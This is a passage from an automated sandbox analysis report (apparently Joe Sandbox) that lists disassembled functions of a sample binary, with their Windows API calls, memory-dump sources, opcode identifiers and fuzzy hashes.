                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                            • String ID:
                                                            • API String ID: 3016257755-0
                                                            • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                            • Instruction ID: 4870b902e72ed76d9f2998e36c2c63348b6b9e98c57754224fb282e6885fbb04
                                                            • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                            • Instruction Fuzzy Hash: 5C017BB214814ABBCF125E85CC05DEE3F63FB18390B488419FA1859131C636C9B1AF81
                                                            APIs
                                                            • GetWindowRect.USER32(?,?), ref: 0071B2E4
                                                            • ScreenToClient.USER32(?,?), ref: 0071B2FC
                                                            • ScreenToClient.USER32(?,?), ref: 0071B320
                                                            • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 0071B33B
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: ClientRectScreen$InvalidateWindow
                                                            • String ID:
                                                            • API String ID: 357397906-0
                                                            • Opcode ID: 2bec43f42d4f33bc7f50b7448ba930a34a463701839a2bd1e7b4d2f0ceba649b
                                                            • Instruction ID: 8fe13473690d8c291b35f365e11271bc1e68086c8e995317c925a70d0678d1b8
                                                            • Opcode Fuzzy Hash: 2bec43f42d4f33bc7f50b7448ba930a34a463701839a2bd1e7b4d2f0ceba649b
                                                            • Instruction Fuzzy Hash: 5A1144B9D00209EFDB41CFA9C8849EEBBF9FF08310F108166E914E3260D735AA658F54
                                                            APIs
                                                            • EnterCriticalSection.KERNEL32(?), ref: 006F6BE6
                                                              • Part of subcall function 006F76C4: _memset.LIBCMT ref: 006F76F9
                                                            • _memmove.LIBCMT ref: 006F6C09
                                                            • _memset.LIBCMT ref: 006F6C16
                                                            • LeaveCriticalSection.KERNEL32(?), ref: 006F6C26
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: CriticalSection_memset$EnterLeave_memmove
                                                            • String ID:
                                                            • API String ID: 48991266-0
                                                            • Opcode ID: c8904b0cd9d811693be894f02fd8090b04aec19899d1059f2a3619ff1793dd3d
                                                            • Instruction ID: c4f933b25b605df6d97ad38b0894d3eb9688e189ebdbc82d0004b958f7c12335
                                                            • Opcode Fuzzy Hash: c8904b0cd9d811693be894f02fd8090b04aec19899d1059f2a3619ff1793dd3d
                                                            • Instruction Fuzzy Hash: 54F03A7A200104ABCF416F55DC85A8ABB2AEF45321B04C0A5FE089E266C735E851CBB8
                                                            APIs
                                                            • GetSysColor.USER32(00000008), ref: 00692231
                                                            • SetTextColor.GDI32(?,000000FF), ref: 0069223B
                                                            • SetBkMode.GDI32(?,00000001), ref: 00692250
                                                            • GetStockObject.GDI32(00000005), ref: 00692258
                                                            • GetWindowDC.USER32(?,00000000), ref: 006CBE83
                                                            • GetPixel.GDI32(00000000,00000000,00000000), ref: 006CBE90
                                                            • GetPixel.GDI32(00000000,?,00000000), ref: 006CBEA9
                                                            • GetPixel.GDI32(00000000,00000000,?), ref: 006CBEC2
                                                            • GetPixel.GDI32(00000000,?,?), ref: 006CBEE2
                                                            • ReleaseDC.USER32(?,00000000), ref: 006CBEED
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                            • String ID:
                                                            • API String ID: 1946975507-0
                                                            • Opcode ID: f28c55eabf4c516a3132085dfe21a076a580ab7bfda4e7674d84eb53be25ccc6
                                                            • Instruction ID: b2521d9683128116387c45d30b384dc401663771b5120047e1ab7b61060612ae
                                                            • Opcode Fuzzy Hash: f28c55eabf4c516a3132085dfe21a076a580ab7bfda4e7674d84eb53be25ccc6
                                                            • Instruction Fuzzy Hash: 93E03932144248FADF215FA8FC0DBE83B12EB05332F10C36AFA69880E1C7754990EB12
                                                            APIs
                                                            • GetCurrentThread.KERNEL32 ref: 006E871B
                                                            • OpenThreadToken.ADVAPI32(00000000,?,?,?,006E82E6), ref: 006E8722
                                                            • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,006E82E6), ref: 006E872F
                                                            • OpenProcessToken.ADVAPI32(00000000,?,?,?,006E82E6), ref: 006E8736
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: CurrentOpenProcessThreadToken
                                                            • String ID:
                                                            • API String ID: 3974789173-0
                                                            • Opcode ID: d2c4388b59a69907c1452b4e728b265e41477846f5122732679a0380a500ebb9
                                                            • Instruction ID: 916b4921ba3a832865cb40d184cd275d40301619cb00518f2711c08a5d401669
                                                            • Opcode Fuzzy Hash: d2c4388b59a69907c1452b4e728b265e41477846f5122732679a0380a500ebb9
                                                            • Instruction Fuzzy Hash: DAE04F366123119FDB205FB55D0CBDA3BA8EF54791F15C828E649CA090DA3884428754
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: %r
                                                            • API String ID: 0-2999538795
                                                            • Opcode ID: 0ae4fa7075a1ab6df4b07a88fe28f0698fd7c6b7f6821dbd248f4ef20b13b43c
                                                            • Instruction ID: b13af2218a1cd67bd75b3332d5a1c918cefd86f36d4916b971011878357077aa
                                                            • Opcode Fuzzy Hash: 0ae4fa7075a1ab6df4b07a88fe28f0698fd7c6b7f6821dbd248f4ef20b13b43c
                                                            • Instruction Fuzzy Hash: 14B180719002099ACF15EF94C485AFEB7BFFF44710F10802AF516ABA91DB349E86CB95
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: __itow_s
                                                            • String ID: xbu$xbu
                                                            • API String ID: 3653519197-888344011
                                                            • Opcode ID: 475afe96c8b50650e2f23c7497e9fbcca6e233effeedf7ad1119c143bff2651f
                                                            • Instruction ID: b886a031ac0db30d64aec558ee6022d60f03f72dd9315f3dc810e9117e9abe65
                                                            • Opcode Fuzzy Hash: 475afe96c8b50650e2f23c7497e9fbcca6e233effeedf7ad1119c143bff2651f
                                                            • Instruction Fuzzy Hash: E0B16D70A0020AEBCF14DF54C891EAABBFAFF58310F148159F9459B291EB74EA41CB64
                                                            APIs
                                                              • Part of subcall function 006AFC86: _wcscpy.LIBCMT ref: 006AFCA9
                                                              • Part of subcall function 00699837: __itow.LIBCMT ref: 00699862
                                                              • Part of subcall function 00699837: __swprintf.LIBCMT ref: 006998AC
                                                            • __wcsnicmp.LIBCMT ref: 006FB02D
                                                            • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 006FB0F6
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                            • String ID: LPT
                                                            • API String ID: 3222508074-1350329615
                                                            • Opcode ID: dfeff488a4f22fe2590ae7aca444b3f207f8b913b35d36653bf2e6617f968edb
                                                            • Instruction ID: 477523e172bf8f3a3ae930306525871e239b967d42d25cb82288c3ee8ce827fb
                                                            • Opcode Fuzzy Hash: dfeff488a4f22fe2590ae7aca444b3f207f8b913b35d36653bf2e6617f968edb
                                                            • Instruction Fuzzy Hash: 5C617075A00219AFCB14DF98C891EFEB7BAEB09310F10416DF916AB351DB70AE81CB55
                                                            APIs
                                                            • Sleep.KERNEL32(00000000), ref: 006A2968
                                                            • GlobalMemoryStatusEx.KERNEL32(?), ref: 006A2981
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: GlobalMemorySleepStatus
                                                            • String ID: @
                                                            • API String ID: 2783356886-2766056989
                                                            • Opcode ID: 503f429636b11a3f5e153709cf8308a0a2e3b7f3499e4b129f014e4f8dc453dd
                                                            • Instruction ID: 2d009bf9c9b4716e12eb81314afea6900efc3cabe21818d32a006e41f6737a8b
                                                            • Opcode Fuzzy Hash: 503f429636b11a3f5e153709cf8308a0a2e3b7f3499e4b129f014e4f8dc453dd
                                                            • Instruction Fuzzy Hash: EC5159714187449FDB60EF14D885BAFB7ECFB85340F41885DF2D8810A1EB309929CB6A
                                                            APIs
                                                              • Part of subcall function 00694F0B: __fread_nolock.LIBCMT ref: 00694F29
                                                            • _wcscmp.LIBCMT ref: 006F9824
                                                            • _wcscmp.LIBCMT ref: 006F9837
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: _wcscmp$__fread_nolock
                                                            • String ID: FILE
                                                            • API String ID: 4029003684-3121273764
                                                            • Opcode ID: 5cc39ef7cd7bfc8e83f1fb5a029ff4900b6044e62a84c0b09bf6370aecb2d58d
                                                            • Instruction ID: 617cf7e2c166d74e3b039cf2f793b7385cafcbf3dee706506f6de02b91817b07
                                                            • Opcode Fuzzy Hash: 5cc39ef7cd7bfc8e83f1fb5a029ff4900b6044e62a84c0b09bf6370aecb2d58d
                                                            • Instruction Fuzzy Hash: 8841A871A0021EBADF659AA4CC85FEFB7BEDF85710F00047DFA04A7181DA7199058B65
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: ClearVariant
                                                            • String ID: Ddu$Ddu
                                                            • API String ID: 1473721057-4131560066
                                                            • Opcode ID: a8b69dc1a4df87c0c95df840e22aa14f1c322d775f67f1c34a7d81d7f17e6cbc
                                                            • Instruction ID: a5d35257765c3cc5dba0c99e4e10b48304891da7a050d14aa929603e0177d916
                                                            • Opcode Fuzzy Hash: a8b69dc1a4df87c0c95df840e22aa14f1c322d775f67f1c34a7d81d7f17e6cbc
                                                            • Instruction Fuzzy Hash: 46512478A083418FDB54CF58C580AAABBF6FB99754F54881DE8858B720D331EC81CF82
                                                            APIs
                                                            • _memset.LIBCMT ref: 0070259E
                                                            • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 007025D4
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: CrackInternet_memset
                                                            • String ID: |
                                                            • API String ID: 1413715105-2343686810
                                                            • Opcode ID: 5bfbea10db7db9b1baa5139352b6a1c4e4d7aa821fe671c4a48e0d87d95ab4ab
                                                            • Instruction ID: 14de2470f1696b23aa25a0ed3e35938356f521a0b22a60d90d184ec243da6d66
                                                            • Opcode Fuzzy Hash: 5bfbea10db7db9b1baa5139352b6a1c4e4d7aa821fe671c4a48e0d87d95ab4ab
                                                            • Instruction Fuzzy Hash: FD313A71810119EBCF41EFA0CC89EEEBFBAFF08310F100159F915AA162EB355956DB64
                                                            APIs
                                                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 00717B61
                                                            • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00717B76
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: MessageSend
                                                            • String ID: '
                                                            • API String ID: 3850602802-1997036262
                                                            • Opcode ID: 47216c6340d8089ec0e1a8096a7324db5037d275264bc1ff485660b056e2f0dd
                                                            • Instruction ID: dead9369ce0f697828f51896eea14335e6a0274139cfb4aabd156c058dbd051d
                                                            • Opcode Fuzzy Hash: 47216c6340d8089ec0e1a8096a7324db5037d275264bc1ff485660b056e2f0dd
                                                            • Instruction Fuzzy Hash: 3A410874A0930A9FDB14CF68C891BDABBB5FF08300F10416AE905AB391D774AA91CF90
                                                            APIs
                                                            • DestroyWindow.USER32(?,?,?,?), ref: 00716B17
                                                            • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00716B53
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: Window$DestroyMove
                                                            • String ID: static
                                                            • API String ID: 2139405536-2160076837
                                                            • Opcode ID: be2a3b6db2784da958383e9a982a2ceeb1e808baca87e8803b1aa87fcddab1f0
                                                            • Instruction ID: 4057577c72777f2a43528d0180b47e3501c984df1494b4d37176c7151359af3d
                                                            • Opcode Fuzzy Hash: be2a3b6db2784da958383e9a982a2ceeb1e808baca87e8803b1aa87fcddab1f0
                                                            • Instruction Fuzzy Hash: 7A316BB1200604AEDB109F68DC81AFB77A9FF48760F10C61DF9A9D7190DA39AC91CB64
                                                            APIs
                                                            • _memset.LIBCMT ref: 006F2911
                                                            • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 006F294C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: InfoItemMenu_memset
                                                            • String ID: 0
                                                            • API String ID: 2223754486-4108050209
                                                            • Opcode ID: 8f686a48ae21cf6db0bf29a5d3eb62ae1b97b39977e9988d3605806757f35bda
                                                            • Instruction ID: 636d3409c934f7ce2f84f88b07815c5293de7c640a94128d3ce39002973c55f8
                                                            • Opcode Fuzzy Hash: 8f686a48ae21cf6db0bf29a5d3eb62ae1b97b39977e9988d3605806757f35bda
                                                            • Instruction Fuzzy Hash: BD31C331A0030E9FEB24CF99C895BFEBBB6EF45350F144029EA95A72A0D7B09944CF51
                                                            APIs
                                                            • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00716761
                                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0071676C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: MessageSend
                                                            • String ID: Combobox
                                                            • API String ID: 3850602802-2096851135
                                                            • Opcode ID: 569beb44ee4781aaafcaa77acd30d093dc3e4d1411358b74347f5c676150a74a
                                                            • Instruction ID: b6b78555ffd5037314e956d8e70fb6b5d111deb34b6514a03832886ad91da88e
                                                            • Opcode Fuzzy Hash: 569beb44ee4781aaafcaa77acd30d093dc3e4d1411358b74347f5c676150a74a
                                                            • Instruction Fuzzy Hash: DD118275300209AFEF11DF58DC81EFB376EEB493A8F104529F914972D0D6799C9187A0
                                                            APIs
                                                              • Part of subcall function 00691D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00691D73
                                                              • Part of subcall function 00691D35: GetStockObject.GDI32(00000011), ref: 00691D87
                                                              • Part of subcall function 00691D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00691D91
                                                            • GetWindowRect.USER32(00000000,?), ref: 00716C71
                                                            • GetSysColor.USER32(00000012), ref: 00716C8B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                            • String ID: static
                                                            • API String ID: 1983116058-2160076837
                                                            • Opcode ID: 305e60b922bd9a03403802a1923165410e751f6891079b02df69bd4f0871224c
                                                            • Instruction ID: 75976a7818bd5c59de92e64993aba173dcb67cd4d3b867e912121751cbe936fc
                                                            • Opcode Fuzzy Hash: 305e60b922bd9a03403802a1923165410e751f6891079b02df69bd4f0871224c
                                                            • Instruction Fuzzy Hash: 2221FC72510209AFDF04DFA8CC45AFA7BA9FB08715F104529F955D2290E639E851DB60
                                                            APIs
                                                            • GetWindowTextLengthW.USER32(00000000), ref: 007169A2
                                                            • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 007169B1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: LengthMessageSendTextWindow
                                                            • String ID: edit
                                                            • API String ID: 2978978980-2167791130
                                                            • Opcode ID: 8f95b888b04aaaa634a6e3440d8474a7a82f59eaf325c453c9e97c1e566d97e9
                                                            • Instruction ID: 57c5446605b86ecb4077cf531158b0e122fe291b2c41a78d25d5f40275e9ead4
                                                            • Opcode Fuzzy Hash: 8f95b888b04aaaa634a6e3440d8474a7a82f59eaf325c453c9e97c1e566d97e9
                                                            • Instruction Fuzzy Hash: 92114F71510204ABEF108F78DC45AEB376AEF053B4F508728F9A5971E0C779EC919B60
